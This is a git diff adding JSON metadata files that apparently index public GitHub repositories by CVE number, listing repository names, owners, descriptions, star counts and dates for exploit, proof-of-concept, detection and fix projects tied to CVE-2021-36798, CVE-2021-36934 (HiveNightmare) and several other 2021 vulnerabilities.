+ "description": "CVE-2021-36798: CobaltStrike < 4.4 Dos",
+ "fork": false,
+ "created_at": "2021-09-06T11:49:03Z",
+ "updated_at": "2024-02-20T07:02:39Z",
+ "pushed_at": "2021-09-26T10:02:37Z",
+ "stargazers_count": 104,
+ "watchers_count": 104,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 104,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 571614292,
+ "name": "CobaltSploit",
+ "full_name": "sponkmonk\/CobaltSploit",
+ "owner": {
+ "login": "sponkmonk",
+ "id": 31475386,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31475386?v=4",
+ "html_url": "https:\/\/github.com\/sponkmonk"
+ },
+ "html_url": "https:\/\/github.com\/sponkmonk\/CobaltSploit",
+ "description": "Tool which leverages CVE-2021-36798 (HotCobalt) and related work from SentinelOne to DoS CobaltStrike 4.2 and 4.3 servers",
+ "fork": false,
+ "created_at": "2022-11-28T14:09:43Z",
+ "updated_at": "2022-05-24T08:55:57Z",
+ "pushed_at": "2022-09-27T06:04:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36799.json b/2021/CVE-2021-36799.json
new file mode 100644
index 0000000000..ad6eb769e5
--- /dev/null
+++ b/2021/CVE-2021-36799.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 387188990,
+ "name": "ets5-password-recovery",
+ "full_name": "robertguetzkow\/ets5-password-recovery",
+ "owner": {
+ "login": "robertguetzkow",
+ "id": 25986807,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25986807?v=4",
+ "html_url": "https:\/\/github.com\/robertguetzkow"
+ },
+ "html_url": "https:\/\/github.com\/robertguetzkow\/ets5-password-recovery",
+ "description": "ETS5 Password Recovery Tool is a PoC for CVE-2021-36799",
+ "fork": false,
+ "created_at": "2021-07-18T13:59:43Z",
+ "updated_at": "2024-04-15T17:16:44Z",
+ "pushed_at": "2022-07-23T14:08:41Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "decryption",
+ "poc",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36808.json b/2021/CVE-2021-36808.json
new file mode 100644
index 0000000000..9748452a1a
--- /dev/null
+++ b/2021/CVE-2021-36808.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 426136857,
+ "name": "CVE-2021-36808",
+ "full_name": "ctuIhu\/CVE-2021-36808",
+ "owner": {
+ "login": "ctuIhu",
+ "id": 59749563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59749563?v=4",
+ "html_url": "https:\/\/github.com\/ctuIhu"
+ },
+ "html_url": "https:\/\/github.com\/ctuIhu\/CVE-2021-36808",
+ "description": "A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.",
+ "fork": false,
+ "created_at": "2021-11-09T07:48:55Z",
+ "updated_at": "2021-11-09T07:54:51Z",
+ "pushed_at": "2021-11-09T07:54:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36934.json b/2021/CVE-2021-36934.json
new file mode 100644
index 0000000000..17992ffad8
--- /dev/null
+++ b/2021/CVE-2021-36934.json
@@ -0,0 +1,644 @@
+[
+ {
+ "id": 387926337,
+ "name": "ShadowSteal",
+ "full_name": "HuskyHacks\/ShadowSteal",
+ "owner": {
+ "login": "HuskyHacks",
+ "id": 57866415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4",
+ "html_url": "https:\/\/github.com\/HuskyHacks"
+ },
+ "html_url": "https:\/\/github.com\/HuskyHacks\/ShadowSteal",
+ "description": "Pure Nim implementation for exploiting CVE-2021-36934, the SeriousSAM local privilege escalation",
+ "fork": false,
+ "created_at": "2021-07-20T22:16:49Z",
+ "updated_at": "2024-05-29T17:01:46Z",
+ "pushed_at": "2022-01-16T02:09:46Z",
+ "stargazers_count": 203,
+ "watchers_count": 203,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "exploit-development",
+ "nim",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 203,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 388119730,
+ "name": "CVE-2021-36934",
+ "full_name": "JoranSlingerland\/CVE-2021-36934",
+ "owner": {
+ "login": "JoranSlingerland",
+ "id": 32357871,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32357871?v=4",
+ "html_url": "https:\/\/github.com\/JoranSlingerland"
+ },
+ "html_url": "https:\/\/github.com\/JoranSlingerland\/CVE-2021-36934",
+ "description": "Fix for the CVE-2021-36934",
+ "fork": false,
+ "created_at": "2021-07-21T13:06:51Z",
+ "updated_at": "2023-01-22T08:49:14Z",
+ "pushed_at": "2021-10-15T23:44:37Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 388194766,
+ "name": "CVE-2021-36934",
+ "full_name": "n3tsurge\/CVE-2021-36934",
+ "owner": {
+ "login": "n3tsurge",
+ "id": 1574741,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574741?v=4",
+ "html_url": "https:\/\/github.com\/n3tsurge"
+ },
+ "html_url": "https:\/\/github.com\/n3tsurge\/CVE-2021-36934",
+ "description": "Detection and Mitigation script for CVE-2021-36934 (HiveNightmare aka. SeriousSam)",
+ "fork": false,
+ "created_at": "2021-07-21T17:24:44Z",
+ "updated_at": "2021-08-25T06:37:22Z",
+ "pushed_at": "2021-07-22T02:10:56Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 388286318,
+ "name": "VSSCopy",
+ "full_name": "Wh04m1001\/VSSCopy",
+ "owner": {
+ "login": "Wh04m1001",
+ "id": 44291883,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4",
+ "html_url": "https:\/\/github.com\/Wh04m1001"
+ },
+ "html_url": "https:\/\/github.com\/Wh04m1001\/VSSCopy",
+ "description": "Small and dirty PoC for CVE-2021-36934",
+ "fork": false,
+ "created_at": "2021-07-22T00:55:23Z",
+ "updated_at": "2021-07-26T14:35:30Z",
+ "pushed_at": "2021-07-22T02:15:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388311709,
+ "name": "Invoke-HiveNightmare",
+ "full_name": "WiredPulse\/Invoke-HiveNightmare",
+ "owner": {
+ "login": "WiredPulse",
+ "id": 19207515,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19207515?v=4",
+ "html_url": "https:\/\/github.com\/WiredPulse"
+ },
+ "html_url": "https:\/\/github.com\/WiredPulse\/Invoke-HiveNightmare",
+ "description": "PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer",
+ "fork": false,
+ "created_at": "2021-07-22T03:07:56Z",
+ "updated_at": "2023-10-16T13:01:15Z",
+ "pushed_at": "2022-09-24T20:40:17Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388374451,
+ "name": "SeriousSam",
+ "full_name": "romarroca\/SeriousSam",
+ "owner": {
+ "login": "romarroca",
+ "id": 87074019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87074019?v=4",
+ "html_url": "https:\/\/github.com\/romarroca"
+ },
+ "html_url": "https:\/\/github.com\/romarroca\/SeriousSam",
+ "description": "HiveNightmare a.k.a. SeriousSam Local Privilege Escalation in Windows – CVE-2021-36934",
+ "fork": false,
+ "created_at": "2021-07-22T07:49:29Z",
+ "updated_at": "2024-05-12T04:41:05Z",
+ "pushed_at": "2021-07-22T11:39:31Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 388449471,
+ "name": "Invoke-HiveDreams",
+ "full_name": "WiredPulse\/Invoke-HiveDreams",
+ "owner": {
+ "login": "WiredPulse",
+ "id": 19207515,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19207515?v=4",
+ "html_url": "https:\/\/github.com\/WiredPulse"
+ },
+ "html_url": "https:\/\/github.com\/WiredPulse\/Invoke-HiveDreams",
+ "description": "A capability to identify and remediate CVE-2021-36934 (HiveNightmare)",
+ "fork": false,
+ "created_at": "2021-07-22T12:10:41Z",
+ "updated_at": "2023-05-18T04:28:59Z",
+ "pushed_at": "2021-07-22T14:42:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388453276,
+ "name": "CVE-2021-36934",
+ "full_name": "tda90\/CVE-2021-36934",
+ "owner": {
+ "login": "tda90",
+ "id": 48199685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48199685?v=4",
+ "html_url": "https:\/\/github.com\/tda90"
+ },
+ "html_url": "https:\/\/github.com\/tda90\/CVE-2021-36934",
+ "description": "CVE-2021-36934 PowerShell Fix",
+ "fork": false,
+ "created_at": "2021-07-22T12:24:24Z",
+ "updated_at": "2021-07-29T06:47:23Z",
+ "pushed_at": "2021-07-29T06:47:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 388499292,
+ "name": "CVE-2021-36934",
+ "full_name": "VertigoRay\/CVE-2021-36934",
+ "owner": {
+ "login": "VertigoRay",
+ "id": 792482,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/792482?v=4",
+ "html_url": "https:\/\/github.com\/VertigoRay"
+ },
+ "html_url": "https:\/\/github.com\/VertigoRay\/CVE-2021-36934",
+ "description": "Windows Elevation of Privilege Vulnerability (SeriousSAM)",
+ "fork": false,
+ "created_at": "2021-07-22T14:53:09Z",
+ "updated_at": "2021-08-06T14:49:37Z",
+ "pushed_at": "2021-07-24T12:03:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388607076,
+ "name": "CVE-2021-36934",
+ "full_name": "bytesizedalex\/CVE-2021-36934",
+ "owner": {
+ "login": "bytesizedalex",
+ "id": 17046773,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17046773?v=4",
+ "html_url": "https:\/\/github.com\/bytesizedalex"
+ },
+ "html_url": "https:\/\/github.com\/bytesizedalex\/CVE-2021-36934",
+ "description": "CVE-2021-36934 PowerShell scripts",
+ "fork": false,
+ "created_at": "2021-07-22T21:54:45Z",
+ "updated_at": "2021-07-28T01:48:39Z",
+ "pushed_at": "2021-07-23T19:14:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 389125344,
+ "name": "CVE-2021-36934",
+ "full_name": "Preventions\/CVE-2021-36934",
+ "owner": {
+ "login": "Preventions",
+ "id": 46875161,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46875161?v=4",
+ "html_url": "https:\/\/github.com\/Preventions"
+ },
+ "html_url": "https:\/\/github.com\/Preventions\/CVE-2021-36934",
+ "description": "C# PoC for CVE-2021-36934\/HiveNightmare\/SeriousSAM",
+ "fork": false,
+ "created_at": "2021-07-24T14:58:10Z",
+ "updated_at": "2023-09-06T02:44:58Z",
+ "pushed_at": "2021-07-24T13:01:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 62,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 62,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 389226743,
+ "name": "PyNightmare",
+ "full_name": "Sp00p64\/PyNightmare",
+ "owner": {
+ "login": "Sp00p64",
+ "id": 59793368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59793368?v=4",
+ "html_url": "https:\/\/github.com\/Sp00p64"
+ },
+ "html_url": "https:\/\/github.com\/Sp00p64\/PyNightmare",
+ "description": "PoC for CVE-2021-36934 Aka HiveNightmare\/SeriousSAM written in python3",
+ "fork": false,
+ "created_at": "2021-07-25T00:31:11Z",
+ "updated_at": "2023-09-10T12:41:42Z",
+ "pushed_at": "2021-07-25T01:19:31Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 389410092,
+ "name": "Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM",
+ "full_name": "jmaddington\/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM",
+ "owner": {
+ "login": "jmaddington",
+ "id": 2353597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2353597?v=4",
+ "html_url": "https:\/\/github.com\/jmaddington"
+ },
+ "html_url": "https:\/\/github.com\/jmaddington\/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM",
+ "description": "This PowerShell script will take the mitigation measures for CVE-2021-36934 described by Microsoft and the US CERT team. https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-36934 https:\/\/kb.cert.org\/vuls\/id\/506989 USE AT YOUR OWN RISK -- BACKUPS MAY BREAK.",
+ "fork": false,
+ "created_at": "2021-07-25T18:00:35Z",
+ "updated_at": "2024-04-09T12:36:03Z",
+ "pushed_at": "2021-07-25T18:10:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 389555386,
+ "name": "CVE-2021-36934",
+ "full_name": "0x0D1n\/CVE-2021-36934",
+ "owner": {
+ "login": "0x0D1n",
+ "id": 23523771,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23523771?v=4",
+ "html_url": "https:\/\/github.com\/0x0D1n"
+ },
+ "html_url": "https:\/\/github.com\/0x0D1n\/CVE-2021-36934",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-26T08:01:08Z",
+ "updated_at": "2021-07-26T08:18:37Z",
+ "pushed_at": "2021-07-26T08:18:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 389878651,
+ "name": "CVE-2021-36934",
+ "full_name": "exploitblizzard\/CVE-2021-36934",
+ "owner": {
+ "login": "exploitblizzard",
+ "id": 61627070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4",
+ "html_url": "https:\/\/github.com\/exploitblizzard"
+ },
+ "html_url": "https:\/\/github.com\/exploitblizzard\/CVE-2021-36934",
+ "description": "HiveNightmare aka SeriousSAM ",
+ "fork": false,
+ "created_at": "2021-07-27T06:54:30Z",
+ "updated_at": "2023-04-21T05:37:19Z",
+ "pushed_at": "2021-07-27T06:56:18Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 390844451,
+ "name": "CVE-2021-36934",
+ "full_name": "irissentinel\/CVE-2021-36934",
+ "owner": {
+ "login": "irissentinel",
+ "id": 79321563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79321563?v=4",
+ "html_url": "https:\/\/github.com\/irissentinel"
+ },
+ "html_url": "https:\/\/github.com\/irissentinel\/CVE-2021-36934",
+ "description": "CVE-2021-36934 HiveNightmare vulnerability checker and workaround",
+ "fork": false,
+ "created_at": "2021-07-29T20:35:22Z",
+ "updated_at": "2021-07-30T12:29:18Z",
+ "pushed_at": "2021-07-30T12:29:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 391724401,
+ "name": "CVE-2021-36934",
+ "full_name": "websecnl\/CVE-2021-36934",
+ "owner": {
+ "login": "websecnl",
+ "id": 20278695,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20278695?v=4",
+ "html_url": "https:\/\/github.com\/websecnl"
+ },
+ "html_url": "https:\/\/github.com\/websecnl\/CVE-2021-36934",
+ "description": "SeriousSAM Auto Exploiter",
+ "fork": false,
+ "created_at": "2021-08-01T19:54:31Z",
+ "updated_at": "2023-09-28T11:30:04Z",
+ "pushed_at": "2021-09-04T09:27:49Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 391965692,
+ "name": "poc_CVE-2021-36934",
+ "full_name": "grishinpv\/poc_CVE-2021-36934",
+ "owner": {
+ "login": "grishinpv",
+ "id": 88319804,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88319804?v=4",
+ "html_url": "https:\/\/github.com\/grishinpv"
+ },
+ "html_url": "https:\/\/github.com\/grishinpv\/poc_CVE-2021-36934",
+ "description": "POC experiments with Volume Shadow copy Service (VSS)",
+ "fork": false,
+ "created_at": "2021-08-02T13:47:17Z",
+ "updated_at": "2022-11-09T18:13:09Z",
+ "pushed_at": "2021-08-02T13:52:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 392648426,
+ "name": "SeriousSam",
+ "full_name": "shaktavist\/SeriousSam",
+ "owner": {
+ "login": "shaktavist",
+ "id": 87278238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87278238?v=4",
+ "html_url": "https:\/\/github.com\/shaktavist"
+ },
+ "html_url": "https:\/\/github.com\/shaktavist\/SeriousSam",
+ "description": "Windows Elevation of Privilege Vulnerability CVE-2021-36934",
+ "fork": false,
+ "created_at": "2021-08-04T10:37:41Z",
+ "updated_at": "2021-08-04T10:47:55Z",
+ "pushed_at": "2021-08-04T10:47:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 394763090,
+ "name": "CVE-2021-36934-export-shadow-volume-POC",
+ "full_name": "OlivierLaflamme\/CVE-2021-36934-export-shadow-volume-POC",
+ "owner": {
+ "login": "OlivierLaflamme",
+ "id": 25066959,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25066959?v=4",
+ "html_url": "https:\/\/github.com\/OlivierLaflamme"
+ },
+ "html_url": "https:\/\/github.com\/OlivierLaflamme\/CVE-2021-36934-export-shadow-volume-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-10T19:39:28Z",
+ "updated_at": "2021-09-20T04:02:17Z",
+ "pushed_at": "2021-08-10T19:43:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 395403990,
+ "name": "oxide_hive",
+ "full_name": "chron1k\/oxide_hive",
+ "owner": {
+ "login": "chron1k",
+ "id": 88612701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88612701?v=4",
+ "html_url": "https:\/\/github.com\/chron1k"
+ },
+ "html_url": "https:\/\/github.com\/chron1k\/oxide_hive",
+ "description": "Exploit for CVE-2021-36934",
+ "fork": false,
+ "created_at": "2021-08-12T18:01:21Z",
+ "updated_at": "2024-05-02T12:50:50Z",
+ "pushed_at": "2022-05-01T09:47:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-36934",
+ "cybersecurity",
+ "exploit",
+ "rust",
+ "security",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36949.json b/2021/CVE-2021-36949.json
new file mode 100644
index 0000000000..c9fe93cd37
--- /dev/null
+++ b/2021/CVE-2021-36949.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 396130351,
+ "name": "Check-AAD-Connect-for-CVE-2021-36949-vulnerability",
+ "full_name": "Maxwitat\/Check-AAD-Connect-for-CVE-2021-36949-vulnerability",
+ "owner": {
+ "login": "Maxwitat",
+ "id": 18595261,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18595261?v=4",
+ "html_url": "https:\/\/github.com\/Maxwitat"
+ },
+ "html_url": "https:\/\/github.com\/Maxwitat\/Check-AAD-Connect-for-CVE-2021-36949-vulnerability",
+ "description": "check if Azure AD Connect is affected by the vulnerability described in CVE-2021-36949",
+ "fork": false,
+ "created_at": "2021-08-14T21:05:30Z",
+ "updated_at": "2024-02-21T11:45:54Z",
+ "pushed_at": "2021-08-15T18:39:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36955.json b/2021/CVE-2021-36955.json
new file mode 100644
index 0000000000..0742a7f281
--- /dev/null
+++ b/2021/CVE-2021-36955.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 515072694,
+ "name": "CVE-2021-36955-EXP",
+ "full_name": "JiaJinRong12138\/CVE-2021-36955-EXP",
+ "owner": {
+ "login": "JiaJinRong12138",
+ "id": 45488822,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45488822?v=4",
+ "html_url": "https:\/\/github.com\/JiaJinRong12138"
+ },
+ "html_url": "https:\/\/github.com\/JiaJinRong12138\/CVE-2021-36955-EXP",
+ "description": "CVE-2021-36955",
+ "fork": false,
+ "created_at": "2022-07-18T07:08:56Z",
+ "updated_at": "2023-06-01T03:14:56Z",
+ "pushed_at": "2023-08-15T15:42:39Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36981.json b/2021/CVE-2021-36981.json
new file mode 100644
index 0000000000..4179eb9fbb
--- /dev/null
+++ b/2021/CVE-2021-36981.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483644661,
+ "name": "CVE-2021-36981",
+ "full_name": "0xBrAinsTorM\/CVE-2021-36981",
+ "owner": {
+ "login": "0xBrAinsTorM",
+ "id": 26419565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26419565?v=4",
+ "html_url": "https:\/\/github.com\/0xBrAinsTorM"
+ },
+ "html_url": "https:\/\/github.com\/0xBrAinsTorM\/CVE-2021-36981",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-20T12:26:24Z",
+ "updated_at": "2022-05-05T09:18:01Z",
+ "pushed_at": "2022-05-05T12:18:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3707.json b/2021/CVE-2021-3707.json
new file mode 100644
index 0000000000..856af7806c
--- /dev/null
+++ b/2021/CVE-2021-3707.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 371966757,
+ "name": "DSL-2750U-Full-chain",
+ "full_name": "HadiMed\/DSL-2750U-Full-chain",
+ "owner": {
+ "login": "HadiMed",
+ "id": 57273771,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57273771?v=4",
+ "html_url": "https:\/\/github.com\/HadiMed"
+ },
+ "html_url": "https:\/\/github.com\/HadiMed\/DSL-2750U-Full-chain",
+ "description": "CVE-2021-3707 , CVE-2021-3708",
+ "fork": false,
+ "created_at": "2021-05-29T12:24:04Z",
+ "updated_at": "2023-02-04T15:49:42Z",
+ "pushed_at": "2022-01-21T17:30:09Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3707",
+ "cve-2021-3708"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37152.json b/2021/CVE-2021-37152.json
new file mode 100644
index 0000000000..e052f37494
--- /dev/null
